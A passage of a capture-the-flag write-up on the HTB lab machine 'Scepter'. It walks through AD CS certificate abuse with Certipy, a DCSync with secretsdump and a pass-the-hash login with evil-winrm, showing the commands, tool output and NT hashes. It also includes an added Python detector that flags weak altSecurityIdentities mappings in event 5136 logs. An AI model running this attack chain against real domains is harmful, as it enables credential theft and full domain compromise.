KRB5CCNAME=d.baker.ccache certipy req -k -u "p.adams" -target "dc01.scepter.htb" -ca "scepter-DC01-CA" -template "StaffAccessCertificate" -out p.adams.pfx
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[!] DC host (-dc-host) not specified and Kerberos authentication is used. This might fail
[!] DNS resolution failed: The DNS query name does not exist: dc01.scepter.htb.
[!] Use -debug to print a stacktrace
[!] DNS resolution failed: The DNS query name does not exist: SCEPTER.HTB.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 5
[*] Successfully requested certificate
[*] Got certificate without identity
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'p.adams.pfx'
[*] Wrote certificate and private key to 'p.adams.pfx'
If you get a name mismatch, check that the email set in p.adams's altSecurityIdentities is the same as the email in the certificate.
─$ certipy auth -pfx p.adams.pfx -username p.adams -domain scepter.htb -dc-ip 10.10.11.65
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     No identities found in this certificate
[!] Could not find identity in the provided certificate
[*] Using principal: 'p.adams@scepter.htb'
[*] Trying to get TGT...
[-] Name mismatch between certificate and user 'p.adams'
[-] See the wiki for more information
After using the right email address I got the TGT and NT hash for p.adams.
$  certipy auth -pfx p.adams.pfx -username p.adams -domain scepter.htb -dc-ip 10.10.11.65
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     No identities found in this certificate
[!] Could not find identity in the provided certificate
[*] Using principal: 'p.adams@scepter.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'p.adams.ccache'
[*] Wrote credential cache to 'p.adams.ccache'
[*] Trying to retrieve NT hash for 'p.adams'
[*] Got hash for 'p.adams@scepter.htb': aad3b435b51404eeaad3b435b51404ee:1b925c524sdfs221a8789c4b118ce0
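
Both directory writes in this chain, the mail change on D.Baker and the altSecurityIdentities change on P.Adams, show up as Security event 5136 when directory service change auditing and a matching SACL are in place. The following added example (not from the original write-up) runs detection logic over constructed 5136 records; the timestamps, D.Baker's DN, the e.lewis and 4724 events and the baseline are made up for illustration.

```python
import re

VALUE_ADDED = "%%14674"    # OperationType in event 5136 when a value is written
VALUE_DELETED = "%%14675"  # OperationType in event 5136 when a value is removed
WEAK_MAP_RE = re.compile(r"^X509:(?:<RFC822>|<S>|<I>[^<]*<S>)", re.I)
RFC822_RE = re.compile(r"^X509:<RFC822>(.+)$", re.I)

BAKER = "CN=d.baker,OU=Staff Access Certificate,DC=scepter,DC=htb"  # assumed DN
ADAMS = "CN=p.adams,OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb"
BROWN = "CN=h.brown,CN=Users,DC=scepter,DC=htb"
LEWIS = "CN=e.lewis,CN=Users,DC=scepter,DC=htb"                     # assumed DN

# RFC822 mappings already present in the directory before the events below.
BASELINE = {"h.brown@scepter.htb": BROWN}


def change(time, actor, dn, attr, value, op=VALUE_ADDED):
    """Build one constructed 5136 record using the event's own field names."""
    return {"EventID": 5136, "TimeCreated": time, "SubjectUserName": actor,
            "ObjectDN": dn, "AttributeLDAPDisplayName": attr,
            "AttributeValue": value, "OperationType": op}


# Constructed sample events, deliberately out of order.
EVENTS = [
    change("2025-07-22T02:49:30Z", "a.carter", BAKER, "mail", "p.adams@scepter.htb"),
    change("2025-07-21T03:28:10Z", "a.carter", BAKER, "mail", "h.brown@scepter.htb"),
    change("2025-07-21T09:00:00Z", "administrator", LEWIS, "mail", "e.lewis@scepter.htb"),
    change("2025-07-22T02:40:05Z", "h.brown", ADAMS, "altSecurityIdentities",
           "X509:<RFC822>p.adams@scepter.htb"),
    change("2025-07-22T02:49:29Z", "a.carter", BAKER, "mail", "h.brown@scepter.htb",
           op=VALUE_DELETED),
    {"EventID": 4724, "TimeCreated": "2025-07-21T03:20:00Z",
     "SubjectUserName": "d.baker", "TargetUserName": "a.carter"},
]


def detect(events, baseline_mappings):
    """Flag weak mappings being added and mail values that hit someone else's mapping."""
    mapped = {mail.lower(): dn.lower() for mail, dn in baseline_mappings.items()}
    alerts = []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        if ev["EventID"] != 5136 or ev["OperationType"] != VALUE_ADDED:
            continue
        attr = ev["AttributeLDAPDisplayName"].lower()
        value = ev["AttributeValue"].strip()
        target = ev["ObjectDN"].lower()
        rule = None
        if attr == "altsecurityidentities" and WEAK_MAP_RE.match(value):
            rule = "weak-mapping-added"
            rfc822 = RFC822_RE.match(value)
            if rfc822:
                # Track the new mapping so later mail changes are checked against it.
                mapped[rfc822.group(1).lower()] = target
        elif attr == "mail":
            owner = mapped.get(value.lower())
            # The mapped account using its own address is normal; anyone else is not.
            if owner and owner != target:
                rule = "mail-collides-with-mapping"
        if rule:
            alerts.append({"rule": rule, "time": ev["TimeCreated"],
                           "actor": ev["SubjectUserName"],
                           "object": ev["ObjectDN"], "value": value})
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS, BASELINE):
        print(alert["time"], alert["rule"], alert["actor"], "->", alert["object"])
```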
We could then DCSync, get the administrator hash and get the root flag.
┌──(kali㉿kali)-[~]
└─$ KRB5CCNAME=p.adams.ccache secretsdump.py -k -no-pass dc01.scepter.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] Cleaning up...
And get the flag
evil-winrm -i dc01.scepter.htb -u administrator -H a291easdfs3f9773dc615e66c2ea21c4